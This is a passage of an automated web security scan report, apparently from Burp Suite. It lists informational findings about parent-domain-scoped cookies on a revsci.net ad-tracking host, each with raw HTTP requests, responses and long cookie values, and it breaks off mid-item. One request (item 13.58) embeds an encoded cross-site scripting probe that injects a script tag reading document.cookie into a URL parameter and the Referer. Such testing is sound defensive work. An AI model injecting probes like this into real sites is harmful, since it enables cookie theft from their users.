P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:15:55 GMT
Content-Length: 1089

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','D08734_72078','H07707_11017','H07707_11018','H07707_11028','H07707_11029','
...[SNIP]...

13.58. http://pix04.revsci.net/H07707/b3/0/3/0806180/215595401.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/215595401.js

Issue detail

The cookies issued by the application in the response below are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/215595401.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252Fcategory%252Fmain-topicse7f31%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C%252Fscript%25253Ed4e86dd7255%252Fmergers-acquisitions%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_REF%3Dhttp%253A%252F%252Fburp%252Fshow%252F0%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topicse7f31%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed4e86dd7255/mergers-acquisitions/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_ZiPR=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPNOsPC7nMUV/0bee4znL85ahvsdqPJYmPBzmH54bBx8TYNCTYObQM7enbGl6Gwz9X2lHanrF8ryjbBfhMfqjV5MpzMugEJZgqS0tRA2BY0s54Y2J3S3lZSvIJkGEakbmX73O1EdOqxfU0TWt1Dk0Jjyr11LP+EJVZ5w+avJuoz43fhFun61TlfbkhVuzsZRCINtd3vk9VxrtK2FH07+6wdxbc=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:26:08 GMT; Path=/
Set-Cookie: rtc_C-P4=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+E/r/9Dz2ruFLBtozaNrNCnxTv/CPBK4vxuKCe62VWohhBnMq1x/q0J22fzirjvhsYDeU2ou1Z4c7QpH/iIvZSk4jupAadTP3jJwOGhjpBlL0D/pb7eB9//K6gCqUY7F9avCH3SeUbAKZ8SaMucKXkSP0/UCmQq5H3prJ3dI4SCV2jsz357yIBJ1Wmb9VWkVixIXqd2sv4V4HAIcSCMcLipNC98B0t/No+oQiekPIcQ2jiRXxTdKUdmHxepDyCKFkkH2RhtOjE3aHseBOExJGngyl45Qk65yXrEpCHpsPH8; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:26:08 GMT; Path=/
Set-Cookie: NETSEGS_H07707=d303c7ec11fd6a67&H07707&0&4df0add0&0&&4dca5d68&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; Domain=.revsci.net; Expires=Thu, 09-Jun-2011 11:26:08 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:26:07 GMT
Content-Length: 849

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70010','D08734_70105','H07707_11028','H07707_11029','H07707_11044','H07707_11048'];
var rsiExp=new Date((new Date()).getTime()+2
...[SNIP]...

13.59. http://pix04.revsci.net/H07707/b3/0/3/0806180/225588936.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/225588936.js

Issue detail

The cookies issued by the application in the response below are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/225588936.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F09%252Fprivate-equity-has-a-horse-in-this-race%252F%26DM_CAT%3DNYTimesglobal%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_qHsP=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:04:17 GMT; Path=/
Set-Cookie: rtc_l-Qz=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:04:17 GMT; Path=/
Set-Cookie: NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a8b1&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Thu, 09-Jun-2011 11:04:17 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:04:16 GMT
Content-Length: 1089

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','D08734_72078','H07707_11017','H07707_11018','H07707_11028','H07707_11029','
...[SNIP]...

13.60. http://pix04.revsci.net/H07707/b3/0/3/0806180/273184684.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/273184684.js

Issue detail

The cookies issued by the application in the response below are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/273184684.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F10%252Fapollo-to-buy-out-american-idol-owner%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/10/apollo-to-buy-out-american-idol-owner/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_Zy6z=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:04 GMT; Path=/
Set-Cookie: rtc_z1Ed=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:04 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:37:03 GMT
Content-Length: 1269

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','H07707_10872','D08734_72078','H07707_10950','H07707_10954','H07707_10987','
...[SNIP]...

13.61. http://pix04.revsci.net/H07707/b3/0/3/0806180/293330189.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/293330189.js

Issue detail

The cookies issued by the application in the response below are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/293330189.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F03%252Fonex-sells-husky-international-for-2-1-billion%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/onex-sells-husky-international-for-2-1-billion/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_7N2M=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4kmheQIMDjaxY4NY56qG7poa4ScLEaatLDiorNn5vw/ZUtic7CPZq60bIzTlnSCIjQNpmQyiPpn1WLZYGIVHHqRL8VuyK4KTktWpKfhIdHIBwclAI+6iD3yXxATNyXVdCP9qr5pUf86eVqDRYrXnrWOQjJGgQmy7sH3W0QYN9ncBmAi6AFeBtqgO+BHtTmqf+IwWdMW+vn20BWfxvnJZS8x1vTAmlPu7yTn9sxzlDvQISj2WEjZNX5rXV5ukaTRHGuM2yeuQT4RICgZT5x2mDJvn8tq9GJ7UH/gE6iPm5BKu3WqKlqylGDQsXLxPXLrxUvqZgL/GXlsGJHcV2yLjheFx52zg/AdJWYX0xIqaWFDAinkd+HFgH/FBcPcf5PGHkf42QFcsCVqWq77hxoYmwYkrpfC7Hs8gZrse1DI9+qNwbwtyVVHII0+JZJa1OaEzmF6Zw8e7llMjMyCkhULZ21J9kYowe2hqB6T83cVhkCcqx3pt3vCz1JWV+51wLTq7ZHPu9iPjPSzpK3S+ft1SGY1b15QeMEL8FbeKr45VXaZhA4iyTvuoNgHNfNAwuf5ZTSqHt3njl/nLryYbUcwVcj0rU4iQDzK3OJqawxSQEscdP/rysIqog/GQ2d00Vor80g0DqI5PW3StZUxHSWn8Mulk5ukpRBDquCzWhZQqzAYIWPSu++uiy6wK+qWj/nKwno0H8DqYoSUH0/lR3qsSkiJMZXAyDMdC0rBuy4Er5vBhC4RQE/AZM7twEeK2MA2nim3FhYD81F+53dMLxegwtk8NtBOnMUobxgR4EvlW+teQygc0uHK8DJ1E; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:40:01 GMT; Path=/
Set-Cookie: rtc_kcMU=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:40:01 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:40:01 GMT
Content-Length: 1269

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','H07707_10872','D08734_72078','H07707_10950','H07707_10954','H07707_10987','
...[SNIP]...

13.62. http://pix04.revsci.net/H07707/b3/0/3/0806180/396037982.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/396037982.js

Issue detail

The cookies issued by the application in the response below are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/396037982.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F06%252Fhow-well-did-warner-musics-investors-do%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/06/how-well-did-warner-musics-investors-do/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_TX1Q=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4j+huHIMHvC1v6FY5BAFiE2lu64fVY6/Tm+YLTQmufPZ01rc6vdg2v/oPlIcMX/OvdTE/uq6JB33VvBVw0bvGRPtPVF+v31Di+ws9t2aJi6fJfcYPOegZxQVZYR2KOkQqCbRlwQpf87la8qMva2fdzFQ0Rjo4nVnPf51DBQFzH8NDiVhMKNJfwEt1TQbc0vhwojK+4qaN2+/+HnGmsjpufR5knvKQ8N//2J3I/z/74Fa0h7TEN0cV4UW2ewjF12bJ/yIk67vBSwjKBtCVtSnBPdqT1qu883AOe0/82dCdGlIU/ssRDzOF7worKDEPkB4qT+ibUaClOlYPsIrC3MEcG2omGwvO5NgVAjNTNuSN58+l4tQTtPevwht31nvuqfXdgXWTuaXrXb1gXp1KTPtf7kb9UYzupdyf5PX0IkVznHvumJnRYiWH+nYii7438v9NbzKztvTTKaZfeCphtHUw7gnP/uNalPDQCz6vEcinpDTJr/HSESuGASxo7VdJ4qIj/oD8XuAK4TuCotbm/W/AovIHMJ5LD9Y/KYGPxsCPABSHpul6yzR9OAoNE8CsWbwoY76Fu2Z9q2aeQWqJN5VERwz6NAC3n4CZDyL1irUCYY+ZAHAiw7x2UhXmxSNo+ZrIbKJfUn8WDqKhYpr/lcG5TPKc0KmVcV8AoTfKiiUmZ5s8xWGNeTqs8WNiDI0CQHiUZtow78bGv8yAtv0vMAiLlB+b0aOEsxN4b9NFMR7Oi/Iufbc1FfizZQYxVJ5mYmbsBdDeOjWyy9wMy/g8ZjrVJ7rHZnfzJWYx84+SAgnbh/fcyRq; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:18 GMT; Path=/
Set-Cookie: rtc_4K_j=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:18 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:37:17 GMT
Content-Length: 1269

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','H07707_10872','D08734_72078','H07707_10950','H07707_10954','H07707_10987','
...[SNIP]...

13.63. http://pix04.revsci.net/H07707/b3/0/3/0806180/513736918.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/513736918.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/513736918.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252Fcategory%252Fmain-topics%252Fventure-capital%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_REF%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F12%252Ftakeda-in-talks-to-buy-nycomed-for-up-to-14-billion%252F%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/venture-capital/
Cookie: NETID01=529777297210b0ea0bebf89fb75e37bd; udm_0=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; NETSEGS_H07707=d303c7ec11fd6a67&H07707&0&4df0add0&0&&4dca5d68&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; rsi_segs_1000000=pUPNOkPF7gMUFq3R0NZJg79Yas1wQQBbbXSBXm54UoIg8jZQmRgO/0Iny1pmOVO4twqF+wHN3TSjXx8300qePNJ5roo9DbO9WklOtTIsXCYB/8h4D9v+3oIbfS+2MGelkxH+zcSjFgFrky+dcCdmBamiMyQ+LMGXujCnvV4wnM7ZTba/eheTvgvP57JkOj1KgvZGifP9WSlmXa/V8uXC5G3uMw==; rtc_rbW-=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+Enr//DyFLu1LNxozaNrNCnxTv/CPBK4vwUC37I+Pw2DxDH9eVMUC9zB1mGK9JGee2kZ/rkxh9ZhsvGXmyp1GIOejNCcp29JzcATN8GDRgxtWQLVIrfqXjLYkKxH2Wkot1CcCcHEV+imu9mtVtV+fEsoPqb8Sx0EexVQw7FtCen+/ihLI/zuRtzoISDJn1i335fn+91HWdFyleqRqt2FFYHQRSR0n0huHL1bBQL7IuGA/Tq/HBv4FOro1WSc6yqw+2xjgQcQAAMVLamZ29iRGSHkD6u/g3+COdPKCAvGf4n

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_rbW-=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOcPC7nMQVv0bea4zXdqaN00wXH9OwgTAQapo1TU0ubO+NPBo4EXogx1f8njWmBHnqWfgLfri7RfBvzJVf7SyFDaR0MlGrKGTiaYJPamDzK30EAT/SI126MtmimUuvg/k+PioAHg+J+FH9aWWWPcaDCerAS40UiAbyIU8lpYp6sc3is99Ym7hKs946X4C6xZvJ/hnt7zarqcdNGab9as5vCNbT8VG0DCe+/XysCwh/pOGz5TYyg==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:27:47 GMT; Path=/
Set-Cookie: rtc_bwZ4=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+E3r/9Dz2ruFLBtozaNrNCnxTv/CPBK4vxuKCe62VWohhBnMq1x/q0J22fzirjvhsYDeU2ou1Z4c7QpH/iIvZSk4jupAadTP3jJwOGhjpBlL0D/pb7eB9//K6gCqUY7F9avCH3SeUbAKZ8SaMucKXkSP0/UCmQq5H3prJ3dI4SCV2jsz357yIBJ1Wmb9VWkVixIXqd2sv4V4HAIcSCMcLipNC98B0t/No+oQiekPIcQ2jiRXxTdKUdmHxepDyCKFkkH2RhtOjE3aHseBOExJGngyl45Qk65yXrEpCF5Z/4S; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:27:47 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:27:47 GMT
Content-Length: 1029

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70010','D08734_70105','H07707_10872','H07707_11017','H07707_11018','H07707_10678','H07707_11020','H07707_11028','H07707_11029','
...[SNIP]...

13.64. http://pix04.revsci.net/H07707/b3/0/3/0806180/551354059.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/551354059.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/551354059.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F03%252Fforstmann-is-said-to-be-undergoing-treatment-for-brain-cancer%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
